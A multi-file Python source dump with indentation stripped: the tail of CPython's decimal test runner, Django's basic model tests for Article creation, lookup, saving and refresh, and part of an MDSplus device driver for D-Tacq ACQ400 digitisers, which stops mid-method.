CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
tests.py | from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet, ValuesListQuerySet
from django.test import (
TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Area man programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Area man programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and was assuming
compared objects were both Field instances raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertIsInstance(qs, ValuesListQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Area woman programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Area man programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Area man programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Area woman'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Area woman programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Area woman programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Area woman programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Area man programs in Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Area',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(TestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_fk_on_delete_set_null(self):
a = Article.objects.create(
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
s1 = SelfRef.objects.create(article=a)
a.delete()
s1.refresh_from_db()
self.assertIsNone(s1.article_id)
self.assertIsNone(s1.article)
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(TestCase):
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertIsInstance(field.related, ForeignObjectRel)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.rel instead.'
)
|
acq400_base.py | #
# Copyright (c) 2017, Massachusetts Institute of Technology All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import MDSplus
import threading
# import Queue
from Queue import Queue, Empty
import socket
import time
import inspect
import os
import logging
try:
acq400_hapi = __import__('acq400_hapi', globals(), level=1)
except:
acq400_hapi = __import__('acq400_hapi', globals())
print("pgmwashere {} {} HAPI {}".format("acq400_base", __file__, acq400_hapi.__file__))
class _ACQ400_BASE(MDSplus.Device):
"""
D-Tacq ACQ400 Base parts and methods.
All other carrier/function combinations use this class as a parent class.
"""
base_parts=[
# The user will need to change the hostname to the relevant hostname/IP.
{'path':':NODE','type':'text','value':'acq2106_999', 'options':('no_write_shot',)},
{'path':':SITE','type':'numeric', 'value': 1, 'options':('no_write_shot',)},
{'path':':TRIG_MODE','type':'text', 'value': 'role_default', 'options':('no_write_shot',)},
{'path':':ROLE','type':'text', 'value': 'fpmaster', 'options':('no_write_shot',)},
{'path':':FREQ','type':'numeric', 'value': int(1e6), 'options':('no_write_shot',)},
{'path':':TOFF','type':'numeric', 'value': int(0), 'options':('no_write_shot',)},
{'path':':SAMPLES','type':'numeric', 'value': int(1e5), 'options':('no_write_shot',)},
{'path':':INIT_ACTION', 'type':'action', 'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',50,None),Method(None,'INIT',head))",'options':('no_write_shot',)},
{'path':':ARM_ACTION', 'type':'action', 'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',51,None),Method(None,'ARM',head))",'options':('no_write_shot',)},
{'path':':STORE_ACTION', 'type':'action', 'valueExpr':"Action(Dispatch('CAMAC_SERVER','INIT',52,None),Method(None,'STORE',head))",'options':('no_write_shot',)},
]
trig_types=[ 'hard', 'soft', 'automatic']
def setChanScale(self,num):
chan=self.__getattr__('INPUT_%3.3d' % num)
print("pgmwashere. BOGUS alert. computed but going nowhere:{}".format(chan))
def init(self):
uut = acq400_hapi.Acq400(self.node.data(), monitor=False)
trig_types=[ 'hard', 'soft', 'automatic']
trg = self.trig_mode.data()
if trg == 'hard':
trg_dx = 0
elif trg == 'automatic':
trg_dx = 1
elif trg == 'soft':
trg_dx = 1
# The default case is to use the trigger set by sync_role.
if self.trig_mode.data() == 'role_default':
uut.s0.sync_role = "{} {}".format(self.role.data(), self.freq.data())
else:
# If the user has specified a trigger.
uut.s0.sync_role = '{} {} TRG:DX={}'.format(self.role.data(), self.freq.data(), trg_dx)
# Now we set the trigger to be soft when desired.
if trg == 'soft':
uut.s0.transient = 'SOFT_TRIGGER=0'
if trg == 'automatic':
uut.s0.transient = 'SOFT_TRIGGER=1'
uut.s0.transient = "POST={}".format(self.samples.data())
INIT = init
class _ACQ400_ST_BASE(_ACQ400_BASE):
"""
A sub-class of _ACQ400_BASE that includes classes for streaming data
and the extra nodes for streaming devices.
"""
st_base_parts = [
{'path':':RUNNING', 'type':'numeric', 'options':('no_write_model',)},
{'path':':SEG_LENGTH', 'type':'numeric', 'value': 8000, 'options':('no_write_shot',)},
{'path':':MAX_SEGMENTS','type':'numeric', 'value': 1000, 'options':('no_write_shot',)},
{'path':':SEG_EVENT', 'type':'text', 'value': 'STREAM','options':('no_write_shot',)},
{'path':':TRIG_TIME', 'type':'numeric', 'options':('write_shot',)}
]
def arm(self):
self.running.on=True
thread = self.MDSWorker(self)
thread.start()
ARM=arm
def stop(self):
self.running.on = False
STOP = stop
class MDSWorker(threading.Thread):
NUM_BUFFERS = 20
def __init__(self,dev):
super(_ACQ400_ST_BASE.MDSWorker,self).__init__(name=dev.path)
threading.Thread.__init__(self)
self.dev = dev.copy()
self.chans = []
self.decim = []
# self.nchans = self.dev.sites*32
uut = acq400_hapi.Acq400(self.dev.node.data())
self.nchans = uut.nchan()
for i in range(self.nchans):
self.chans.append(getattr(self.dev, 'INPUT_%3.3d'%(i+1)))
self.decim.append(getattr(self.dev, 'INPUT_%3.3d:DECIMATE' %(i+1)).data())
self.seg_length = self.dev.seg_length.data()
self.segment_bytes = self.seg_length*self.nchans*np.int16(0).nbytes
self.empty_buffers = Queue()
self.full_buffers = Queue()
for i in range(self.NUM_BUFFERS):
self.empty_buffers.put(bytearray(self.segment_bytes))
self.device_thread = self.DeviceWorker(self)
def run(self):
def lcm(a,b):
from fractions import gcd
return (a * b / gcd(int(a), int(b)))
def lcma(arr):
ans = 1.
for e in arr:
ans = lcm(ans, e)
return int(ans)
if self.dev.debug:
print("MDSWorker running")
event_name = self.dev.seg_event.data()
dt = 1./self.dev.freq.data()
decimator = lcma(self.decim)
if self.seg_length % decimator:
self.seg_length = (self.seg_length // decimator + 1) * decimator
self.device_thread.start()
